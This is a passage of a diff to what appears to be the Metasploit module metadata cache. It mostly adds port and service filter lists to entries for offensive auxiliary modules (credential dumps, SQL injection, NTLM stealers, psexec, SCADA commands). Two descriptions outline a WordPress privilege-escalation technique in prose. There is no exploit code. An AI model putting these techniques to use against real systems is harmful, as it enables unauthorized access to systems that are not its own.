"targets": null, "mod_time": "2018-09-15 18:54:45 +0000", "path": "/modules/auxiliary/admin/http/sysaid_sql_creds.rb", @@ -2292,6 +3233,21 @@ "platform": "Linux", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2018-05-23 09:32:41 +0000", "path": "/modules/auxiliary/admin/http/telpho10_credential_dump.rb", @@ -2321,6 +3277,21 @@ "platform": "", "arch": "", "rport": 8180, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2018-08-21 08:50:26 +0000", "path": "/modules/auxiliary/admin/http/tomcat_administration.rb", @@ -2354,6 +3325,21 @@ "platform": "", "arch": "", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-11-09 03:00:24 +0000", "path": "/modules/auxiliary/admin/http/tomcat_utf8_traversal.rb", @@ -2389,6 +3375,21 @@ "platform": "", "arch": "", "rport": 8443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-11-09 03:00:24 +0000", "path": "/modules/auxiliary/admin/http/trendmicro_dlp_traversal.rb", @@ -2420,6 +3421,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2018-03-15 10:46:08 +0000", "path": "/modules/auxiliary/admin/http/typo3_news_module_sqli.rb", @@ -2452,6 +3468,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2018-07-12 17:34:52 +0000", "path": "/modules/auxiliary/admin/http/typo3_sa_2009_001.rb", @@ -2485,6 +3516,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/http/typo3_sa_2009_002.rb", @@ -2517,6 +3563,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2018-07-12 17:34:52 +0000", "path": "/modules/auxiliary/admin/http/typo3_sa_2010_020.rb", @@ -2546,6 +3607,21 @@ "platform": "", "arch": "", "rport": 8503, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/http/typo3_winstaller_default_enc_keys.rb", @@ -2577,6 +3653,21 @@ "platform": "", "arch": "", "rport": 22006, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2018-02-15 16:31:09 +0000", "path": "/modules/auxiliary/admin/http/ulterius_file_download.rb", @@ -2610,6 +3701,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2018-08-24 13:18:32 +0000", "path": "/modules/auxiliary/admin/http/vbulletin_upgrade_admin.rb", @@ -2642,6 +3748,21 @@ "platform": "", "arch": "", "rport": 9090, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2018-09-15 18:54:45 +0000", "path": "/modules/auxiliary/admin/http/webnms_cred_disclosure.rb", @@ -2673,6 +3794,21 @@ "platform": "", "arch": "", "rport": 9090, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2018-09-15 18:54:45 +0000", "path": "/modules/auxiliary/admin/http/webnms_file_download.rb", @@ -2705,6 +3841,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/http/wp_custom_contact_forms.rb", @@ -2723,21 +3874,36 @@ "disclosure_date": "2015-02-25", "type": "auxiliary", "author": [ - "Rob Carr " + "rastating" ], "description": "The WordPress WP EasyCart plugin from version 1.1.30 to 3.0.20 allows authenticated\n users of any user level to set any system option via a lack of validation in the\n ec_ajax_update_option and ec_ajax_clear_all_taxrates functions located in\n /inc/admin/admin_ajax_functions.php. The module first changes the admin e-mail address\n to prevent any notifications being sent to the actual administrator during the attack,\n re-enables user registration in case it has been disabled and sets the default role to\n be administrator. This will allow for the user to create a new account with admin\n privileges via the default registration page found at /wp-login.php?action=register.", "references": [ "CVE-2015-2673", "WPVDB-7808", - "URL-http://blog.rastating.com/wp-easycart-privilege-escalation-information-disclosure" + "URL-https://rastating.github.io/wp-easycart-privilege-escalation-information-disclosure/" ], "is_server": false, "is_client": false, "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, - "mod_time": "2017-08-24 21:38:44 +0000", + "mod_time": "2018-10-01 18:59:09 +0000", "path": "/modules/auxiliary/admin/http/wp_easycart_privilege_escalation.rb", "is_install_path": true, "ref_name": "admin/http/wp_easycart_privilege_escalation", @@ -2767,6 +3933,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-10-09 17:06:05 +0000", "path": "/modules/auxiliary/admin/http/wp_symposium_sql_injection.rb", @@ -2786,7 +3967,7 @@ "type": "auxiliary", "author": [ "Evex", - "Rob Carr " + "rastating" ], "description": "The WordPress WPLMS theme from version 1.5.2 to 1.8.4.1 allows an\n authenticated user of any user level to set any system option due to a lack of\n validation in the import_data function of /includes/func.php.\n\n The module first changes the admin e-mail address to prevent any\n notifications being sent to the actual administrator during the attack,\n re-enables user registration in case it has been disabled and sets the default\n role to be administrator. This will allow for the user to create a new account\n with admin privileges via the default registration page found at\n /wp-login.php?action=register.", "references": [ @@ -2797,8 +3978,23 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, - "mod_time": "2017-07-24 06:26:21 +0000", + "mod_time": "2018-10-01 18:59:09 +0000", "path": "/modules/auxiliary/admin/http/wp_wplms_privilege_escalation.rb", "is_install_path": true, "ref_name": "admin/http/wp_wplms_privilege_escalation", @@ -2827,6 +4023,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-10-09 17:06:05 +0000", "path": "/modules/auxiliary/admin/http/zyxel_admin_password_extractor.rb", @@ -2864,6 +4075,12 @@ "platform": "", "arch": "", "rport": 88, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/kerberos/ms14_068_kerberos_checksum.rb", @@ -2895,6 +4112,12 @@ "platform": "", "arch": "", "rport": 7210, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/maxdb/maxdb_cons_exec.rb", @@ -2926,6 +4149,12 @@ "platform": "", "arch": "", "rport": 32764, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/misc/sercomm_dump_config.rb", @@ -2955,6 +4184,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/misc/wol.rb", @@ -2986,6 +4221,12 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2018-09-15 18:54:45 +0000", "path": "/modules/auxiliary/admin/motorola/wr850g_cred.rb", @@ -3018,6 +4259,12 @@ "platform": "", "arch": "", "rport": 0, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/ms/ms08_059_his2006.rb", @@ -3047,6 +4294,20 @@ "platform": "", "arch": "", "rport": 1433, + "autofilter_ports": [ + 1433, + 1434, + 1435, + 14330, + 2533, + 9152, + 2638 + ], + "autofilter_services": [ + "ms-sql-s", + "ms-sql2000", + "sybase" + ], "targets": null, "mod_time": "2017-08-16 21:40:03 +0000", "path": "/modules/auxiliary/admin/mssql/mssql_enum.rb", @@ -3077,6 +4338,20 @@ "platform": "", "arch": "", "rport": 1433, + "autofilter_ports": [ + 1433, + 1434, + 1435, + 14330, + 2533, + 9152, + 2638 + ], + "autofilter_services": [ + "ms-sql-s", + "ms-sql2000", + "sybase" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/mssql/mssql_enum_domain_accounts.rb", @@ -3107,6 +4382,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/mssql/mssql_enum_domain_accounts_sqli.rb", @@ -3136,6 +4426,20 @@ "platform": "", "arch": "", "rport": 1433, + "autofilter_ports": [ + 1433, + 1434, + 1435, + 14330, + 2533, + 9152, + 2638 + ], + "autofilter_services": [ + "ms-sql-s", + "ms-sql2000", + "sybase" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/mssql/mssql_enum_sql_logins.rb", @@ -3165,6 +4469,20 @@ "platform": "", "arch": "", "rport": 1433, + "autofilter_ports": [ + 1433, + 1434, + 1435, + 14330, + 2533, + 9152, + 2638 + ], + "autofilter_services": [ + "ms-sql-s", + "ms-sql2000", + "sybase" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/mssql/mssql_escalate_dbowner.rb", @@ -3194,6 +4512,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/mssql/mssql_escalate_dbowner_sqli.rb", @@ -3223,6 +4556,20 @@ "platform": "", "arch": "", "rport": 1433, + "autofilter_ports": [ + 1433, + 1434, + 1435, + 14330, + 2533, + 9152, + 2638 + ], + "autofilter_services": [ + "ms-sql-s", + "ms-sql2000", + "sybase" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/mssql/mssql_escalate_execute_as.rb", @@ -3252,6 +4599,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/mssql/mssql_escalate_execute_as_sqli.rb", @@ -3281,6 +4643,20 @@ "platform": "", "arch": "", "rport": 1433, + "autofilter_ports": [ + 1433, + 1434, + 1435, + 14330, + 2533, + 9152, + 2638 + ], + "autofilter_services": [ + "ms-sql-s", + "ms-sql2000", + "sybase" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/mssql/mssql_exec.rb", @@ -3315,6 +4691,20 @@ "platform": "", "arch": "", "rport": 1433, + "autofilter_ports": [ + 1433, + 1434, + 1435, + 14330, + 2533, + 9152, + 2638 + ], + "autofilter_services": [ + "ms-sql-s", + "ms-sql2000", + "sybase" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/mssql/mssql_findandsampledata.rb", @@ -3344,6 +4734,20 @@ "platform": "", "arch": "", "rport": 1433, + "autofilter_ports": [ + 1433, + 1434, + 1435, + 14330, + 2533, + 9152, + 2638 + ], + "autofilter_services": [ + "ms-sql-s", + "ms-sql2000", + "sybase" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/mssql/mssql_idf.rb", @@ -3373,6 +4777,20 @@ "platform": "", "arch": "", "rport": 1433, + "autofilter_ports": [ + 1433, + 1434, + 1435, + 14330, + 2533, + 9152, + 2638 + ], + "autofilter_services": [ + "ms-sql-s", + "ms-sql2000", + "sybase" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/mssql/mssql_ntlm_stealer.rb", @@ -3403,6 +4821,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/mssql/mssql_ntlm_stealer_sqli.rb", @@ -3433,6 +4866,20 @@ "platform": "", "arch": "", "rport": 1433, + "autofilter_ports": [ + 1433, + 1434, + 1435, + 14330, + 2533, + 9152, + 2638 + ], + "autofilter_services": [ + "ms-sql-s", + "ms-sql2000", + "sybase" + ], "targets": null, "mod_time": "2017-08-24 21:38:44 +0000", "path": "/modules/auxiliary/admin/mssql/mssql_sql.rb", @@ -3462,6 +4909,20 @@ "platform": "", "arch": "", "rport": 1433, + "autofilter_ports": [ + 1433, + 1434, + 1435, + 14330, + 2533, + 9152, + 2638 + ], + "autofilter_services": [ + "ms-sql-s", + "ms-sql2000", + "sybase" + ], "targets": null, "mod_time": "2017-08-24 21:38:44 +0000", "path": "/modules/auxiliary/admin/mssql/mssql_sql_file.rb", @@ -3491,6 +4952,12 @@ "platform": "", "arch": "", "rport": 3306, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/mysql/mysql_enum.rb", @@ -3520,6 +4987,12 @@ "platform": "", "arch": "", "rport": 3306, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/mysql/mysql_sql.rb", @@ -3549,6 +5022,12 @@ "platform": "", "arch": "", "rport": 5351, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/natpmp/natpmp_map.rb", @@ -3580,6 +5059,12 @@ "platform": "", "arch": "", "rport": 137, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/netbios/netbios_spoof.rb", @@ -3613,6 +5098,21 @@ "platform": "", "arch": "", "rport": 26122, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-11-09 03:00:24 +0000", "path": "/modules/auxiliary/admin/officescan/tmlisten_traversal.rb", @@ -3642,6 +5142,12 @@ "platform": "", "arch": "", "rport": "1521", + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/oracle/ora_ntlm_stealer.rb", @@ -3672,6 +5178,12 @@ "platform": "", "arch": "", "rport": "1521", + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2018-09-15 18:54:45 +0000", "path": "/modules/auxiliary/admin/oracle/oracle_login.rb", @@ -3701,6 +5213,12 @@ "platform": "", "arch": "", "rport": "1521", + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-08-24 21:38:44 +0000", "path": "/modules/auxiliary/admin/oracle/oracle_sql.rb", @@ -3730,6 +5248,12 @@ "platform": "", "arch": "", "rport": "1521", + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/oracle/oraenum.rb", @@ -3762,6 +5286,21 @@ "platform": "", "arch": "", "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-08-24 21:38:44 +0000", "path": "/modules/auxiliary/admin/oracle/osb_execqr.rb", @@ -3796,6 +5335,21 @@ "platform": "", "arch": "", "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/oracle/osb_execqr2.rb", @@ -3827,6 +5381,21 @@ "platform": "", "arch": "", "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/oracle/osb_execqr3.rb", @@ -3856,6 +5425,12 @@ "platform": "", "arch": "", "rport": "1521", + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/oracle/post_exploitation/win32exec.rb", @@ -3885,6 +5460,12 @@ "platform": "", "arch": "", "rport": "1521", + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/oracle/post_exploitation/win32upload.rb", @@ -3915,6 +5496,12 @@ "platform": "", "arch": "", "rport": 1521, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/oracle/sid_brute.rb", @@ -3944,6 +5531,12 @@ "platform": "", "arch": "", "rport": 1521, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/oracle/tnscmd.rb", @@ -3974,6 +5567,12 @@ "platform": "", "arch": "", "rport": 109, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-11-09 03:00:24 +0000", "path": "/modules/auxiliary/admin/pop2/uw_fileretrieval.rb", @@ -4003,6 +5602,12 @@ "platform": "", "arch": "", "rport": 5432, + "autofilter_ports": [ + 5432 + ], + "autofilter_services": [ + "postgres" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/postgres/postgres_readfile.rb", @@ -4032,6 +5637,12 @@ "platform": "", "arch": "", "rport": 5432, + "autofilter_ports": [ + 5432 + ], + "autofilter_services": [ + "postgres" + ], "targets": null, "mod_time": "2017-08-24 21:38:44 +0000", "path": "/modules/auxiliary/admin/postgres/postgres_sql.rb", @@ -4064,6 +5675,21 @@ "platform": "", "arch": "", "rport": 50000, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/sap/sap_configservlet_exec_noauth.rb", @@ -4093,6 +5719,22 @@ "platform": "", "arch": "", "rport": 50013, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443, + 50013 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/sap/sap_mgmt_con_osexec.rb", @@ -4127,6 +5769,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/scada/advantech_webaccess_dbvisitor_sqli.rb", @@ -4160,6 +5817,12 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/scada/ge_proficy_substitute_traversal.rb", @@ -4190,6 +5853,12 @@ "platform": "", "arch": "", "rport": 502, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/scada/modicon_command.rb", @@ -4220,6 +5889,13 @@ "platform": "", "arch": "", "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/scada/modicon_password_recovery.rb", @@ -4250,6 +5926,12 @@ "platform": "", "arch": "", "rport": 502, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/scada/modicon_stux_transfer.rb", @@ -4284,6 +5966,12 @@ "platform": "", "arch": "", "rport": 4800, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/scada/moxa_credentials_recovery.rb", @@ -4315,6 +6003,12 @@ "platform": "", "arch": "", "rport": 44818, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-08-24 21:38:44 +0000", "path": "/modules/auxiliary/admin/scada/multi_cip_command.rb", @@ -4345,6 +6039,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/scada/phoenix_command.rb", @@ -4375,6 +6075,12 @@ "platform": "", "arch": "", "rport": 20111, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2018-07-08 19:00:11 +0000", "path": "/modules/auxiliary/admin/scada/yokogawa_bkbcopyd_client.rb", @@ -4406,6 +6112,12 @@ "platform": "", "arch": "", "rport": 5168, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/serverprotect/file.rb", @@ -4436,6 +6148,14 @@ "platform": "", "arch": "", "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], "targets": null, "mod_time": "2017-11-09 03:00:24 +0000", "path": "/modules/auxiliary/admin/smb/check_dir_file.rb", @@ -4465,6 +6185,14 @@ "platform": "", "arch": "", "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/smb/delete_file.rb", @@ -4494,6 +6222,14 @@ "platform": "", "arch": "", "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], "targets": null, "mod_time": "2018-05-07 00:13:11 +0000", "path": "/modules/auxiliary/admin/smb/download_file.rb", @@ -4524,6 +6260,14 @@ "platform": "", "arch": "", "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/smb/list_directory.rb", @@ -4562,6 +6306,14 @@ "platform": "", "arch": "", "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], "targets": null, "mod_time": "2018-08-27 13:11:22 +0000", "path": "/modules/auxiliary/admin/smb/ms17_010_command.rb", @@ -4601,6 +6353,14 @@ "platform": "", "arch": "", "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], "targets": null, "mod_time": "2018-04-27 20:58:25 +0000", "path": "/modules/auxiliary/admin/smb/psexec_command.rb", @@ -4631,6 +6391,14 @@ "platform": "", "arch": "", "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], "targets": null, "mod_time": "2017-08-01 22:39:14 +0000", "path": "/modules/auxiliary/admin/smb/psexec_ntdsgrab.rb", @@ -4663,6 +6431,14 @@ "platform": "", "arch": "", "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], "targets": null, "mod_time": "2018-07-12 17:34:52 +0000", "path": "/modules/auxiliary/admin/smb/samba_symlink_traversal.rb", @@ -4692,6 +6468,14 @@ "platform": "", "arch": "", "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], "targets": null, "mod_time": "2018-05-07 00:13:11 +0000", "path": "/modules/auxiliary/admin/smb/upload_file.rb", @@ -4725,6 +6509,12 @@ "platform": "", "arch": "", "rport": 111, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/sunrpc/solaris_kcms_readfile.rb", @@ -4755,6 +6545,12 @@ "platform": "", "arch": "", "rport": 1025, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2018-09-13 13:09:01 +0000", "path": "/modules/auxiliary/admin/teradata/teradata_odbc_sql.py", @@ -4788,6 +6584,12 @@ "platform": "", "arch": "", "rport": 69, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/tftp/tftp_transfer_util.rb", @@ -4820,6 +6622,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-08-24 21:38:44 +0000", "path": "/modules/auxiliary/admin/tikiwiki/tikidblib.rb", @@ -4850,6 +6667,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/upnp/soap_portmapping.rb", @@ -4879,6 +6711,21 @@ "platform": "", "arch": "", "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/vmware/poweroff_vm.rb", @@ -4908,6 +6755,21 @@ "platform": "", "arch": "", "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/vmware/poweron_vm.rb", @@ -4937,6 +6799,21 @@ "platform": "", "arch": "", "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/vmware/tag_vm.rb", @@ -4966,6 +6843,21 @@ "platform": "", "arch": "", "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 